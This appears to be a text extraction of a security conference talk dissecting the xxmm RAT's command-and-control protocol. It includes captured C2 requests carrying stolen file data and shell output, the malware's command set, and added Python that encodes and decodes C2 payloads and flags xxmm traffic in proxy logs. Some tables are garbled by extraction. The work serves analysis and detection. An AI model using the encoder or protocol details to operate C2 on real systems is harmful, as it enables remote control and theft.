# Understanding Command and Control

###### - An Anatomy of xxmm Communication

You Nakatsuru, Counter Threat Unit

18/01/19, Japan Security Analyst Conference 2019

-----

###### For analyst / researcher / developer

• Provide information about modern C2 implementation, including:
  • Encryption, compression, proprietary data structures
• Provide training material for C2 analysis
  • You can compare the answers with your own analysis result

###### For incident responder

• Tell you the importance of proxy log analysis and of server investigation by public-sector organizations such as NPA and JPCERT/CC

###### For red teamer

• Provide knowledge of modern C2 implementation that can be used to improve your penetration testing

-----

• Analysis Target: xxmm
• xxmm Communication Analysis
• xxmm Payload Analysis
• Proof of Analysis

-----

## Analysis Target: xxmm

-----

##### xxmm (a.k.a. Minzen)

###### RAT malware used by BRONZE BUTLER

• Good sample to understand a modern command and control protocol
• Uses HTTP/S with proxy
  • GET or POST request
  • Also supports TCP/UDP/ICMP
• Uses encryption
  • RSA + one-time RC4 encryption in its communication
• Uses proprietary data structures
• Is capable of various commands

-----

### Supported Features

• Sleep
• Drive info
• File listing, upload, download, deletion
• Directory creation
• Process creation
• Remote Shell

-----

### Is BRONZE BUTLER Still Active?

###### Seems to be inactive since early 2018

• Several Datper variants were observed from Nov 2017
  • e.g. 517b2695bbf7164bfb9cab0a133bb0b1aeb387cbb7f30aa01bf5d6f89cca4214
• Changed to use a modified RC4 init routine (the slide's code listing did not survive extraction)

-----

### File Information

###### • xxmm dropper (can be downloaded from VT Enterprise)

|SHA-256 hash|4d208c86c8331b7f1f6dd53f83af9ee4ec700a74792b419f663a3ce105d15d1c|
|---|---|
|File type|PE32 executable (GUI) Intel 80386, for MS Windows|
|PE timestamp|Thu May 12 02:44:45 2016 UTC|
|First seen on VT||

###### • xxmm main module (will be loaded by the dropper)

|SHA-256 hash|714863d7d951e87c9cbde87882f9038db7ad7c8dacd29b2c12eb9ebca075ecb8|
|---|---|
|File type|PE32 executable (console) Intel 80386, for MS Windows|
|PE timestamp|Thu May 12 02:44:51 2016 UTC|
|Target binary||

-----

### References / Tools

###### Useful for analysis

• xxmm2_build.exe
  • https://www.virustotal.com/#/file/76340ef248c286270a07e2aeec7b1d6a007e77adde08dc6c1dcaa176aef9e1a8/detection
• xxmm2_steganography.exe
  • https://www.virustotal.com/#/file/27f3a4c757f6e81a0546e47b97cbaab5e5e2b82a6ec2694641cd41ec47b90766/detection
• wincrypto - Python module
  • https://github.com/crappycrypto/wincrypto
• lznt1 - Python module
  • https://github.com/you0708/lznt1

-----

### Unpacking main module

###### xxmm installer contains both 32-bit and 64-bit binaries

-----

### Decrypting All Encrypted Resources

###### Python scripting is an easy way to decrypt

```
[+] could not find rc4key, use default key: 1234
[+] saved unpacked xxmm as xxmm_dropper_unpacked_0.bin
[+] saved unpacked xxmm as xxmm_dropper_unpacked_1.bin
[+] saved unpacked xxmm as xxmm_dropper_unpacked_1_unpacked_0.bin
[+] saved unpacked module as xxmm_dropper_unpacked_1_unpacked_1.bin
[+] saved unpacked module as xxmm_dropper_unpacked_1_unpacked_2.bin
[+] saved unpacked xxmm as xxmm_dropper_unpacked_1_unpacked_3.bin
[+] saved unpacked xxmm as xxmm_dropper_unpacked_1_unpacked_0_unpacked_0.bin
[+] saved unpacked xxmm as xxmm_dropper_unpacked_0_unpacked_0.bin
[+] saved unpacked module as xxmm_dropper_unpacked_0_unpacked_1.bin
[+] saved unpacked module as xxmm_dropper_unpacked_0_unpacked_2.bin
[+] saved unpacked xxmm as xxmm_dropper_unpacked_0_unpacked_3.bin
[+] saved unpacked xxmm as xxmm_dropper_unpacked_0_unpacked_0_unpacked_0.bin
[+] could not find rc4key, use default key: 1234
```

-----

### Process of xxmm Main Module

-----

### 1. Loading Hardcoded Configuration

###### Process of xxmm main module

• Config data is XOR encoded with the key character "f"

-----

### 2. Command List Initialization

###### Process of xxmm main module

-----

### 3. Command & Control Thread

###### Process of xxmm main module

• xxmm can hold 7 C2 server entries in its config

-----

## xxmm Communication Analysis

-----

### Communication Protocol

###### xxmm supports various communication types

|Type|Protocol|Description|
|---|---|---|
|0|HTTP|C2 communication|
|1|HTTP|C2 communication|
|2|HTTP|Download C2 server information|
|4|TCP|C2 communication using proprietary TCP protocol|
|5|UDP|C2 communication using proprietary UDP protocol|
|6|ICMP|C2 communication using ICMP echo|

-----

###### xxmm Communication Analysis

#### Type 2: C2 URL Download

-----

### GET Request to An Image File

###### Usual HTTP GET request to a hardcoded URL

• URL is specified by its config

```
GET /test/test.jpg HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)
Host: www.example.com
Cache-Control: no-cache
```

-----

###### Encrypted Payload in The Image File

• Contains C2 command (DownloadExecute/ChangeURL)
• Markers are specified by its config

|Start marker `xxmm`|Encrypted payload|End marker `mmxx`|
|---|---|---|

-----

###### xxmm Communication Analysis

#### Type 0,1: HTTP C2 Communication

-----

### C2 Communication using HTTP

###### xxmm communicates with the specified C2 server

(Figure: exchange between xxmm and the C2 server; of the step labels only "3. Upload result" survived extraction)

-----

### Ping/Pong

###### Checking C2 server

• Ping/Pong communication will be performed before every C2 communication

```
GET /index.php?id0=39454275&id1=0&id2=f7547c11&id3=0&id6=2400000 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)
Host: www.example.com
Cache-Control: no-cache
```

Response:

```
HTTP/1.1 200 OK
(snip.)
Content-Length: 1

1
```

-----

### 1, 3. Parameters of HTTP Request

```
GET /index.php?id0=b78503d0&id1=0&id2=f7547c11&id3=1&id4=AAAACAAA(snip.)gPcv^lQ!!&id6=2400000 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)
Host: www.example.com
Cache-Control: no-cache
```

|Parameter|Description|Ping|Command Result|Command Request|
|---|---|---|---|---|
|Param 0|Random hex string|8 digits hex string|8 digits hex string|8 digits hex string|
|Param 1|Constant value|0|0|0|
|Param 2|Client ID|8 digits hex string|8 digits hex string|8 digits hex string|
|Param 3|Request type|0|1|2|
|Param 4|Encrypted payload||Base64 like string||
|Param 5|Unknown|?|?|?|
|Param 6|Current interval|2400000|2400000|2400000|

• Param 4 will be sent as POST data if the size is large

-----

### 2. Receive command

###### HTTP Communication with given C2 server

-----

##### Encrypted Payload in GET Request

###### If RSA is enabled

• LZNT1 compression
  • Performed using RtlCompressBuffer
• Add 1 byte header
• RC4 encryption using a randomly generated one-time key
  • RC4 one-time key is encrypted with RSA public key
• Base64 encoding with custom table

```
Standard Base64: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
                 ↓
Custom table:    ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789^`!
```

-----

### One time Key Encryption

###### Using RSA key pair"s"

|Side|Holds|
|---|---|
|xxmm|Server public key, Client private key|
|C2 server|Server private key, Client public key|

• xxmm → C2 server: one-time RC4 encryption key encrypted with the server public key; payload RC4 encrypted + LZNT1 compressed
• C2 server → xxmm: one-time RC4 encryption key encrypted with the client public key; payload RC4 encrypted + LZNT1 compressed

-----

### Decrypting Encrypted Payload

|Header length|RSA flag (0x00000001)|RSA encrypted RC4 key|RC4 encrypted payload|
|---|---|---|---|

Inside the RC4 encrypted payload:

|Compress flag|LZNT1 compressed/plain data|
|---|---|

-----

##### Encrypted Payload in GET Request

###### If RSA is disabled

• LZNT1 compression
  • Performed using RtlCompressBuffer
• Add 1 byte header
• RC4 encryption using the default key
  • "1234"
• Base64 encoding with custom table

```
Standard Base64: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
                 ↓
Custom table:    ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789^`!
```

-----

### Decrypting Encrypted Payload

|Header length|RSA flag (0x00000000)|RC4 encrypted payload|
|---|---|---|

Inside the RC4 encrypted payload:

|Compress flag|LZNT1 compressed/plain data|
|---|---|

-----

## xxmm Payload Analysis

-----

### Data Format of Payload

###### • Need to extract "item" to understand the meaning of the command

|Header length|RSA flag (0x00000001)|RSA encrypted RC4 key|RC4 encrypted payload|
|---|---|---|---|

|Compress flag|LZNT1 compressed/plain data|
|---|---|

|Payload header|Items header|Item|Item|Item|
|---|---|---|---|---|

-----

### Item Structure

###### xxmm uses item lists in its communication and configuration

• Item format:

|Length|ID|Data|
|---|---|---|

• xxmm has various IDs - difficult to enumerate them
• e.g. decoded config (figure not included in this extraction)

-----

### Items Structure

###### Header + Item data

• Items format:

|Length|Type|Items data|
|---|---|---|

• Type 0/10: data from server, Type 1/11: data from client, Type 2: configuration
• e.g. decoded config (figure not included in this extraction)

-----

### Analyzing Items/Item Structure

-----

### Payload Header

```
0x00  edc80b19
0x04  00000000
0x08  0172d218
0x0C  0000007a 00000001 00000018…
```

|Offset|Size|Value|Description|
|---|---|---|---|
|0x00|4|Timestamp|Return value of GetTickCount|
|0x04|4|Split count|Num of "items" blocks (starts from 0)|
|0x08|1|1-byte flag|0: Larger than max size, 1: Less than max size|
|0x0C|Variable|Items|Payload|

-----

### Command and Control

###### Using item structure

Command request:

|Payload header|Items header|Item|Item|Item|・・・|
|---|---|---|---|---|---|
|||0x10001 API name|0x10002 Time stamp|Argument 1||

Command result:

|Payload header|Items header|Item|Item|Item|・・・|
|---|---|---|---|---|---|
|||0x10001 API name|0x10002 Time stamp|0x20004 Status code||

• API name and time stamp in the result are copied from the command items
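The layers described above (custom Base64, the header-length/RSA-flag envelope, RC4 with the default key "1234", the compress flag, the payload header and the Items/Item records) worked through in Python, as an added example that is not the presentation's or xxmm's own code. It constructs a sample id4 value for the RSA-disabled case and decodes it again, which is the round trip an analyst wants when building a decoder against captured requests. Assumptions that the slides do not state: all length, ID and flag fields are 4-byte big-endian (consistent with the "AAAACAAA" and "AAAAiAAAAAF" prefixes of the slides' id4 values and with the payload header dump), an item's Length counts only its Data, compress flag 0 means plain data, and the `lznt1.decompress()` call on the referenced lznt1 module.

```python
import base64
import struct

# Custom Base64 table from the slides: standard '+', '/', '=' become '^', '`', '!'.
TO_STANDARD = bytes.maketrans(b"^`!", b"+/=")
TO_XXMM = bytes.maketrans(b"+/=", b"^`!")
DEFAULT_RC4_KEY = b"1234"  # default key when the RSA flag is 0 (from the slides)

ID_API_NAME = 0x10001      # item IDs taken from the slides
ID_TIMESTAMP = 0x10002
ID_STATUS_CODE = 0x20004
ID_SHELL_OUTPUT = 0x404D6


def xxmm_b64decode(text: str) -> bytes:
    return base64.b64decode(text.encode().translate(TO_STANDARD))


def xxmm_b64encode(data: bytes) -> str:
    return base64.b64encode(data).translate(TO_XXMM).decode()


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric, so the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_envelope(id4: str, rc4_key: bytes = DEFAULT_RC4_KEY):
    """id4 value -> (compress_flag, payload bytes) for the RSA-disabled case.

    Assumption: header length and RSA flag are 4-byte big-endian fields.
    """
    raw = xxmm_b64decode(id4)
    header_len, rsa_flag = struct.unpack(">II", raw[:8])
    if rsa_flag != 0:
        # raw[8:header_len] is the RSA-encrypted one-time RC4 key; recovering it needs the
        # matching private key blob, which this example does not model.
        raise NotImplementedError("RSA-wrapped one-time key needs the private key")
    body = rc4(rc4_key, raw[header_len:])
    compress_flag, data = body[0], body[1:]
    if compress_flag:  # assumption: non-zero flag means LZNT1 compressed
        import lznt1   # https://github.com/you0708/lznt1; decompress() assumed to exist
        data = lznt1.decompress(data)
    return compress_flag, data


def parse_item_list(buf: bytes):
    """Walk Length | ID | Data records (assumed 4-byte big-endian, Length = len(Data))."""
    items, off = [], 0
    while off + 8 <= len(buf):
        length, item_id = struct.unpack(">II", buf[off:off + 8])
        data = buf[off + 8:off + 8 + length]
        if len(data) != length:
            raise ValueError("truncated item at offset %d" % off)
        items.append((item_id, data))
        off += 8 + length
    return items


def parse_payload(data: bytes):
    """Payload header (offsets from the slides) followed by one Items block at 0x0C."""
    timestamp, split_count, flag = struct.unpack(">IIB", data[:9])
    items_len, items_type = struct.unpack(">II", data[0x0C:0x14])
    return {"timestamp": timestamp, "split_count": split_count, "flag": flag,
            "items_type": items_type,
            "items": parse_item_list(data[0x14:0x14 + items_len])}


# Builders used only to construct a sample id4 value for the walk-through.
def build_items(items_type: int, items) -> bytes:
    body = b"".join(struct.pack(">II", len(d), i) + d for i, d in items)
    return struct.pack(">II", len(body), items_type) + body


def build_id4(tick: int, items_blob: bytes, rc4_key: bytes = DEFAULT_RC4_KEY) -> str:
    payload = struct.pack(">IIB", tick, 0, 1) + b"\x00" * 3 + items_blob  # flag at 0x08, items at 0x0C
    body = rc4(rc4_key, b"\x00" + payload)                  # compress flag 0 = plain (assumption)
    return xxmm_b64encode(struct.pack(">II", 8, 0) + body)  # header: length 8, RSA flag 0


def demo():
    """Constructed sample: a 'stdapi_cmd_control' result (type 1, data from client)."""
    items = [(ID_API_NAME, b"stdapi_cmd_control"),
             (ID_TIMESTAMP, struct.pack(">I", 0xEDC80B19)),
             (ID_STATUS_CODE, struct.pack(">I", 0)),
             (ID_SHELL_OUTPUT, b"Windows IP Configuration\r\n")]  # constructed output
    id4 = build_id4(0xEDC80B19, build_items(1, items))
    compress_flag, payload = decode_envelope(id4)
    return id4, compress_flag, parse_payload(payload)


if __name__ == "__main__":
    id4, _, parsed = demo()
    print(id4[:16] + "...")
    for item_id, data in parsed["items"]:
        print("0x%X %r" % (item_id, data))
```

The constructed id4 starts with `AAAACAAA`, the same prefix as the slides' RSA-disabled example, because the 8-byte header `00 00 00 08 00 00 00 00` encodes that way. To test a real capture, feed the id4 query value to `decode_envelope()` and inspect the returned items; a non-zero RSA flag means the server private key blob from the emulation environment is needed first.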
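The Ping/Pong and request-parameter slides above describe exactly the structure that an incident responder can look for in proxy logs; the following Python is an added example (my code, not the presentation's) that scores constructed proxy log lines against that structure: id0 and id2 as 8-digit hex, id1 fixed to 0, id3 in {0,1,2}, id6 numeric, and id4, when present, restricted to the custom alphabet so that a standard Base64 value with `+`, `/` or `=` does not match. The log format, the sample lines and the id4 strings are constructed; the id0/id2 values reuse the slides' examples. The mapping of id3 to "ping", "command result" and "command request" follows the parameter table.

```python
import re
from urllib.parse import parse_qs, urlsplit

HEX8 = re.compile(r"^[0-9a-f]{8}$")
CUSTOM_B64 = re.compile(r"^[A-Za-z0-9^`!]+$")   # xxmm's table: '^' '`' '!' instead of '+' '/' '='
REQUEST_TYPE = {"0": "ping", "1": "command result", "2": "command request"}  # id3 per the slides
XXMM_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"

# Constructed proxy log (not from the slides): <ts> <client> <method> <url> <status> <resp_bytes> "<ua>"
SAMPLE_LOG = """\
2019-01-18T10:00:00Z 10.0.0.5 GET http://www.example.com/index.php?id0=39454275&id1=0&id2=f7547c11&id3=0&id6=2400000 200 1 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
2019-01-18T10:00:01Z 10.0.0.5 GET http://www.example.com/index.php?id0=b78503d0&id1=0&id2=f7547c11&id3=1&id4=AAAACAAAgPcv^lQ!!&id6=2400000 200 512 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
2019-01-18T10:40:02Z 10.0.0.5 POST http://www.example.com/index.php?id0=44be644f&id1=0&id2=f7547c11&id3=1&id6=2400000 200 2 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
2019-01-18T10:41:00Z 10.0.0.9 GET http://www.example.com/index.php?id=5 200 8192 "Mozilla/5.0"
2019-01-18T10:42:00Z 10.0.0.9 GET http://www.example.com/index.php?id0=39454275&id1=0&id2=f7547c11&id3=1&id4=QUJD/w==&id6=2400000 200 100 "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (GET|POST) (\S+) (\d{3}) (\d+) "([^"]*)"$')


def classify_request(url: str):
    """Return request details if the query string has xxmm's id0..id6 shape, else None."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(url).query, keep_blank_values=True).items()}
    if any(k not in q for k in ("id0", "id1", "id2", "id3", "id6")):
        return None
    if not (HEX8.match(q["id0"]) and q["id1"] == "0" and HEX8.match(q["id2"])
            and q["id3"] in REQUEST_TYPE and q["id6"].isdigit()):
        return None
    # id4 is optional (large payloads travel in the POST body); when present it must use
    # the custom alphabet, so '+', '/' or '=' rules the request out.
    if "id4" in q and not CUSTOM_B64.match(q["id4"]):
        return None
    return {"kind": REQUEST_TYPE[q["id3"]], "client_id": q["id2"], "interval_ms": int(q["id6"])}


def scan(lines):
    """Match each log line against the xxmm request shape and annotate the hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, method, url, status, resp_bytes, ua = m.groups()
        info = classify_request(url)
        if info is None:
            continue
        note = None
        if info["kind"] == "ping" and resp_bytes == "1":
            note = "1-byte pong body"            # the server answers a ping with "1"
        elif method == "POST" and "id4" not in url:
            note = "payload in POST body (not in proxy log)"
        hits.append({"ts": ts, "client": client, "host": urlsplit(url).hostname,
                     "ua_match": ua == XXMM_UA, "note": note, **info})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

The `client_id` field (id2) is the pivot: it stays constant across pings, requests and results from one implant, so grouping hits by it separates infected hosts even when several sit behind the same proxy, and `interval_ms` (id6) can be compared against the observed gaps between a client's pings.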
-----

### RAT Command: xxmm API

• GetSystemInformation
• DownloadExecute
• ChangeUrl
• ChangeTimeInterval
• Uninstall
• PlugIn
• PowershellEncodedCommand
• CreateProcessLow

-----

### RAT Command: Standard(?) API

• stdapi_execute_sleep
• stdapi_execute_commandgroup
• stdapi_syncshell_kill
• stdapi_syncshell_control
• stdapi_syncshell_open
• stdapi_cmd_kill
• stdapi_cmd_control
• stdapi_cmd_open
• stdapi_fs_search
• stdapi_fs_file_upload
• stdapi_fs_file_download
• stdapi_fs_file_excute
• stdapi_fs_GetLogicalDriver
• stdapi_fs_sha1
• stdapi_fs_md5
• stdapi_fs_file_move
• stdapi_fs_file_expand_path
• stdapi_fs_stat
• stdapi_fs_separator
• stdapi_fs_delete_file
• stdapi_fs_delete_dir
• stdapi_fs_mkdir
• stdapi_fs_chdir
• stdapi_fs_getwd
• stdapi_fs_ls

-----

### Based on Metasploit API?

###### Same names as the Metasploit API

-----

### Command Details

Each cell gives the item ID followed by its meaning.

|Command|Argument 1|Argument 2|Argument 3|Result 1|Result 2|Result 3|
|---|---|---|---|---|---|---|
|GetSystemInformation|-|-|-|0x4001A (System info)|-|-|
|DownloadExecute|0x404D5 (File data)|0x104D3 (File path)|0x204D4 (Show flag)|-|-|-|
|ChangeUrl|0x104F6 (C2 URL)|0x20529 (Server No.)|-|-|-|-|
|ChangeTimeInterval|0x204F7 (New interval)|-|-|-|-|-|
|Uninstall|0x20535 (Run key flag)|-|-|-|-|-|
|PlugIn|0x404D5 (File data)|-|-|-|-|-|
|PowershellEncodedCommand|0x104F8 (Encoded PS command)|-|-|-|-|-|
|CreateProcessLow|0x1052D (Command line)|0x2052E (Alt process)|-|-|-|-|

-----

### Command Details

|Command|Argument 1|Argument 2|Argument 3|Result 1|Result 2|Result 3|
|---|---|---|---|---|---|---|
|stdapi_fs_ls|0x104B0 (Target dir)|-|-|0x104B1 (File name)|0x104B2 (Full path)|0x800004C4 (File stat)|
|stdapi_fs_getwd|-|-|-|0x104B0 (Current dir)|-|-|
|stdapi_fs_chdir|0x104B0 (Target dir)|-|-|-|-|-|
|stdapi_fs_mkdir|0x104B0 (Target dir)|-|-|-|-|-|
arguments mmand function| |There ar to p in co|| ||| ###### There are several function call to parse arguments in command function ----- ### e.g. File Uploading ###### Request to upload C:¥hoge.txt Command request Item Item Item Item Payload Items ``` 0x10001 0x10002 0x104B2 0x104B2 header header 'stdapi_fs_file_download' Timestamp u'C:¥hoge.txt' '' AAAAiAAAAAFg`y7o2T7BvTFDZDWFuR0Uuu7rlk0uUUytKzrp6Mxy`^AfuAHr1a(snip.)RHJp6p8 qQ5LppSwF4HoD4SRS3i8D5zMmHIxo9N1jtk89i992GlvEfWr1t57gl0LTZQXVihmeedUNbI! xxmm C2 server Item Item Item Item Item Item Payload Items 0x10001 0x10002 0x20004 0x104B2 0x104B2 0x404D5 header header 'stdapi_fs_file Time Status code u'C:¥hoge.txt' '' File data _download' stamp GET /index.php?id0=d65d4f8a&id1=0&id2=f7547c11&id3=1&id4=AAAAiAAA(snip.)Izxj4ER6A^Dg!!&id6=10000 ``` |Payload header|Items header|Item|Item|Item|Item| |---|---|---|---|---|---| |||0x10001|0x10002|0x104B2|0x104B2| |||'stdapi_fs_file_download'|Timestamp|u'C:¥hoge.txt'|''| |Payload header|Items header|Item|Item|Item|Item|Item|Item| |---|---|---|---|---|---|---|---| |||0x10001|0x10002|0x20004|0x104B2|0x104B2|0x404D5| |||'stdapi_fs_file _download'|Time stamp|Status code|u'C:¥hoge.txt'|''|File data| ----- ### e.g. 
Remote Shell ###### To execute 'ipconfig' Command request Payload Items Item Item header header 0x10001 'stdapi_cmd_open' 0x10002 Timestamp ``` AAAAiAAAAAEmb`Wsg0WNLPFrSlzQT9Dd7lHE(snip.)sUsgDpsHqMRYh97zmm0lPnMW^utiDGkFFbNIpgva4QHcNx Payload Items Item Item Item header header 0x10001 'stdapi_cmd_open' 0x10002 Timestamp 0x20004 Status code GET /index.php?id0=55243eab&id1=0&id2=f7547c11&id3=1&id4=AAAAiAAAAAGiI(snip.)uBRuYfmCLbo!&id6=10000 Command request xxmm C2 server Payload Items Item Item Item header header 0x10001 'stdapi_cmd_control' 0x10002 Timestamp 0x404D6 'ipconfig' AAAAiAAAAAFWzEmlvPSj8KASo0uPFhrzCEM5(snip.)haf6XHV8jpRQcXyU71sI`6Ul2MbbVvBpXGdaQuXZ3BlHl7 Payload Items Item Item Item Item header header 0x10001 'stdapi_cmd_control' 0x10002 Timestamp 0x20004 Status code 0x404D6 output POST /index php?id0=44be644f&id1=0&id2=f7547c11&id3=1&id6=10000, id4=AAAAiAAAAAF(snip.)HiNsLOaIMa3 ``` |Payload header|Items header|Item|Col4|Item|Col6| |---|---|---|---|---|---| |||0x10001|'stdapi_cmd_open'|0x10002|Timestamp| |Payload header|Items header|Item|Col4|Item|Col6|Item|Col8| |---|---|---|---|---|---|---|---| |||0x10001|'stdapi_cmd_open'|0x10002|Timestamp|0x20004|Status code| |Payload header|Items header|Item|Col4|Item|Col6|Item|Col8| |---|---|---|---|---|---|---|---| |||0x10001|'stdapi_cmd_control'|0x10002|Timestamp|0x404D6|'ipconfig'| |Payload header|Items header|Item|Col4|Item|Col6|Item|Col8|Item|Col10| |---|---|---|---|---|---|---|---|---|---| |||0x10001|'stdapi_cmd_control'|0x10002|Timestamp|0x20004|Status code|0x404D6|output| ----- ## Proof of Analysis ----- ### C2 Emulation Environment ----- ### Base Provider Key BLOBs ###### RSA key format can be imported by CryptImportKey API • See https://docs.microsoft.com/en-us/windows/desktop/seccrypto/base-provider-key-blobs • We can create the key pair using PowerShell commands ``` Add-Type -AssemblyName System.Security $RSA = New-Object System.Security.Cryptography.RSACryptoServiceProvider Set-Content 
"rsa_server_public_key.bin" -Value $RSA.ExportCspBlob($False) -Encoding Byte Set-Content "rsa_server_private_key.bin" -Value $RSA.ExportCspBlob($True) -Encoding Byte $RSA2 = New-Object System.Security.Cryptography.RSACryptoServiceProvider Set-Content "rsa_client_public_key.bin" -Value $RSA2.ExportCspBlob($False) -Encoding Byte Set-Content "rsa_client_private_key.bin" -Value $RSA2.ExportCspBlob($True) -Encoding Byte ``` |Add-Type -AssemblyName System.Security $RSA = New-Object System.Security.Cryptography.RSACryptoServiceProv|Col2|Col3| |---|---|---| ||Add-Type -AssemblyName System.Security $RSA = New-Object System.Security.Cryptography.RSACryptoServiceProv|| ``` Add-Type -AssemblyName System.Security $RSA = New-Object System.Security.Cryptography.RSACryptoServiceProvider ``` ----- ### Captured Packet ###### "dir" command execution ----- -----